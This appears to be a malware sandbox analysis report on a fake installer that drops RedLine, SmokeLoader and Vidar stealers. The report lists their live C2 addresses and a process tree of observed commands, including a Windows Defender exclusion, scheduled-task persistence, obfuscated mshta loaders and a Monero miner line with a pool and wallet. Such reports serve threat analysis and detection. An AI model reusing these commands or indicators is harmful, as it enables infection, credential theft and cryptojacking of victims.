Resubmissions
13-10-2021 18:35
211013-w8lxmaegdr 1013-10-2021 12:38
211013-pvkdbadhdm 1013-10-2021 05:30
211013-f7nrtsdfa3 1012-10-2021 20:25
211012-y7qwasdbh4 1011-10-2021 21:02
211011-zvywtaabdq 10Analysis
-
max time kernel
25s -
max time network
564s -
platform
windows10_x64 -
resource
win10-de-20210920 -
submitted
12-10-2021 20:25
General
-
Target
setup_x86_x64_install.exe
-
Size
3.4MB
-
MD5
26f28bf2dc2b6afc0dd99cb6ea3879b8
-
SHA1
9270b9f48e2d14cc2cbed61ee2e2389d5f69ce05
-
SHA256
5f30eae71c1b0d08e7ec5adfc9a0dc98078595502b60a584a8df5cdf8cacf7fa
-
SHA512
5a350373e87673c9ba39e5353bea1d7c1f2f7bc62a703ed13e892e69037008f3e2accadbdd0ec0bd976e54c68b79dfad6fb37517dd55448cac4d9d74ae8a037b
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
she
C2
135.181.129.119:4805
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
redline
Botnet
media12
C2
91.121.67.60:2151
Extracted
Family
smokeloader
Version
2020
C2
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.2
Botnet
933
C2
https://mas.to/@serg4325
Attributes
-
profile_id
933
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 29 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Kills process with taskkill 9 IoCs
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0B368385\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20762bc3f6.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20762bc3f6.exeMon20762bc3f6.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206b909958ed4.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon206b909958ed4.exeMon206b909958ed4.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 6606⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 6766⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 7166⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 8126⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 8926⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 9926⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 11046⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20927aab1e5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exeMon20927aab1e5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exeC:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20927aab1e5.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon204014f13870f5e.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon204014f13870f5e.exeMon204014f13870f5e.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon206d48916f93c5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon206d48916f93c5.exeMon206d48916f93c5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7524390.scr"C:\Users\Admin\AppData\Roaming\7524390.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\2734919.scr"C:\Users\Admin\AppData\Roaming\2734919.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3433187.scr"C:\Users\Admin\AppData\Roaming\3433187.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
-
-
-
C:\Users\Admin\AppData\Roaming\6695922.scr"C:\Users\Admin\AppData\Roaming\6695922.scr" /S6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209c830507d573.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exeMon209c830507d573.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exeC:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209c830507d573.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon2083f8d8970a0b2d.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon2083f8d8970a0b2d.exeMon2083f8d8970a0b2d.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon209b3da1556b9a317.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon209b3da1556b9a317.exeMon209b3da1556b9a317.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
-
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5003617.scr"C:\Users\Admin\AppData\Roaming\5003617.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\6513516.scr"C:\Users\Admin\AppData\Roaming\6513516.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\4918364.scr"C:\Users\Admin\AppData\Roaming\4918364.scr" /S8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\8130588.scr"C:\Users\Admin\AppData\Roaming\8130588.scr" /S8⤵
-
-
C:\Users\Admin\AppData\Roaming\8305735.scr"C:\Users\Admin\AppData\Roaming\8305735.scr" /S8⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 15528⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BVHHK.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BVHHK.tmp\setup.tmp" /SL5="$10256,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-VATMS.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-VATMS.tmp\setup.tmp" /SL5="$20278,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QHVDS.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-QHVDS.tmp\postback.exe" ss111⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\11⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe" /F10⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B368385\Mon20d3b8b752.exeMon20d3b8b752.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\ExezmJRs5i4eLQ_kNlOz6m_K.exe"C:\Users\Admin\Pictures\Adobe Films\ExezmJRs5i4eLQ_kNlOz6m_K.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\YfHTL6z9hTuMndrxBlWJmFSK.exe"C:\Users\Admin\Pictures\Adobe Films\YfHTL6z9hTuMndrxBlWJmFSK.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\Documents\iMIz3FM4Wg9xe8MR0Cm2T6PY.exe"C:\Users\Admin\Documents\iMIz3FM4Wg9xe8MR0Cm2T6PY.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\jxnyFXPBA5i31RRKjrtUJQ7l.exe"C:\Users\Admin\Pictures\Adobe Films\jxnyFXPBA5i31RRKjrtUJQ7l.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\1bjVbQkTDA2P9G1rbFG2BTth.exe"C:\Users\Admin\Pictures\Adobe Films\1bjVbQkTDA2P9G1rbFG2BTth.exe"8⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_HZoBt9Rgu82A_sp6QoHTOKb.exe"C:\Users\Admin\Pictures\Adobe Films\_HZoBt9Rgu82A_sp6QoHTOKb.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe"C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe" /mixtwo8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "bLkKqlqqu00BdH3H5EQPEIdz.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\bLkKqlqqu00BdH3H5EQPEIdz.exe" & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "bLkKqlqqu00BdH3H5EQPEIdz.exe" /f10⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF """" == """" for %I iN ( ""C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "" == "" for %I iN ( "C:\Users\Admin\Pictures\Adobe Films\aWmuEHMZ6HX0l9SwHSx1W7XM.exe" ) do taskkill -iM "%~NXI" -f10⤵
-
C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu0211⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRIpt: CLOsE ( CREAteoBJect ( "WScRiPT.sHeLL" ). RUn ( "C:\Windows\system32\cmd.exe /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02 & iF ""-PMDrnm85Xpfala4uMu02"" == """" for %I iN ( ""C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE"" ) do taskkill -iM ""%~NXI"" -f " , 0 , tRue ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ..\BEDAQQT.ExE &&STArT ..\BeDAqQT.EXE -PMDrnm85Xpfala4uMu02& iF "-PMDrnm85Xpfala4uMu02" == "" for %I iN ( "C:\Users\Admin\AppData\Local\Temp\BEDAQQT.ExE" ) do taskkill -iM "%~NXI" -f13⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScripT: clOse ( cREaTeObJECT ( "wscRIPt.SHELL" ). rUN ( "cMd /q /R Echo | SeT /P = ""MZ"" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3 + n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l " , 0 , trUE ) )12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R Echo | SeT /P = "MZ" > 9Ym~JXRX.Lb3 & COpY /b /Y 9YM~jXrX.Lb3+ OFnDRVX.8L3+ n7gDJN.Z + S0esI.qY + VOPW5P.PE + qDrS.CQ~ + U78WYSY.oFM +f36Uy3.T ..\bJUC.L & DEl /q *& STArt msiexec.exe /Y ..\bjUC.l13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "14⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /P = "MZ" 1>9Ym~JXRX.Lb3"14⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /Y ..\bjUC.l14⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -iM "aWmuEHMZ6HX0l9SwHSx1W7XM.exe" -f11⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5_o4gcvZYY2nyhkN9BJPPDsx.exe"C:\Users\Admin\Pictures\Adobe Films\5_o4gcvZYY2nyhkN9BJPPDsx.exe"8⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe"C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-COA3N.tmp\YXI5VkgcC3oBajO8h8Bm6jFD.tmp"C:\Users\Admin\AppData\Local\Temp\is-COA3N.tmp\YXI5VkgcC3oBajO8h8Bm6jFD.tmp" /SL5="$1042E,506127,422400,C:\Users\Admin\Pictures\Adobe Films\YXI5VkgcC3oBajO8h8Bm6jFD.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EVSSH.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-EVSSH.tmp\DYbALA.exe" /S /UID=270910⤵
-
C:\Program Files\Windows Sidebar\CFCRMBZFOM\foldershare.exe"C:\Program Files\Windows Sidebar\CFCRMBZFOM\foldershare.exe" /VERYSILENT11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\20-b8194-e6e-35690-83ffdd212d264\Myleshefaeni.exe"C:\Users\Admin\AppData\Local\Temp\20-b8194-e6e-35690-83ffdd212d264\Myleshefaeni.exe"11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\e8-34cc2-d1b-6faa0-710cb0af2ddd0\ZHesetydici.exe"C:\Users\Admin\AppData\Local\Temp\e8-34cc2-d1b-6faa0-710cb0af2ddd0\ZHesetydici.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\usxtjkag.bir\GcleanerEU.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f15⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exeC:\Users\Admin\AppData\Local\Temp\vcpiuzbb.wju\installer.exe /qn CAMPAIGN="654"13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exeC:\Users\Admin\AppData\Local\Temp\uauihz5d.ld1\any.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ht3yipae.acx\gcleaner.exe" & exit14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f15⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\5j0g5x2r.k5f\autosubplayer.exe /S13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf28B7.tmp\tempfile.ps1"14⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\OlH_5zk6SOajJMBaIzB3tKoc.exe"C:\Users\Admin\Pictures\Adobe Films\OlH_5zk6SOajJMBaIzB3tKoc.exe" silent8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\kCeJgpwJEQ7OeObDNgXblYxQ.exe"C:\Users\Admin\Pictures\Adobe Films\kCeJgpwJEQ7OeObDNgXblYxQ.exe"8⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\3PNQWMBeGRaOuCEGBvyxaspV.exe"C:\Users\Admin\Pictures\Adobe Films\3PNQWMBeGRaOuCEGBvyxaspV.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\3031410.scr"C:\Users\Admin\AppData\Roaming\3031410.scr" /S9⤵
-
-
C:\Users\Admin\AppData\Roaming\6504660.scr"C:\Users\Admin\AppData\Roaming\6504660.scr" /S9⤵
-
-
C:\Users\Admin\AppData\Roaming\7857317.scr"C:\Users\Admin\AppData\Roaming\7857317.scr" /S9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Roaming\2867536.scr"C:\Users\Admin\AppData\Roaming\2867536.scr" /S9⤵
-
-
C:\Users\Admin\AppData\Roaming\7691748.scr"C:\Users\Admin\AppData\Roaming\7691748.scr" /S9⤵
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\VEU6WWfDCCPAZhM1e7ghicaz.exe"C:\Users\Admin\Pictures\Adobe Films\VEU6WWfDCCPAZhM1e7ghicaz.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\c57zPDvNrTsfCwZNxpkhdJac.exe"C:\Users\Admin\Pictures\Adobe Films\c57zPDvNrTsfCwZNxpkhdJac.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\izDNM8R_HszvjoERZBS8xgq2.exe"C:\Users\Admin\Pictures\Adobe Films\izDNM8R_HszvjoERZBS8xgq2.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"C:\Users\Admin\Pictures\Adobe Films\7sju9znCXIWb_JmA7pnUr08O.exe"6⤵
-
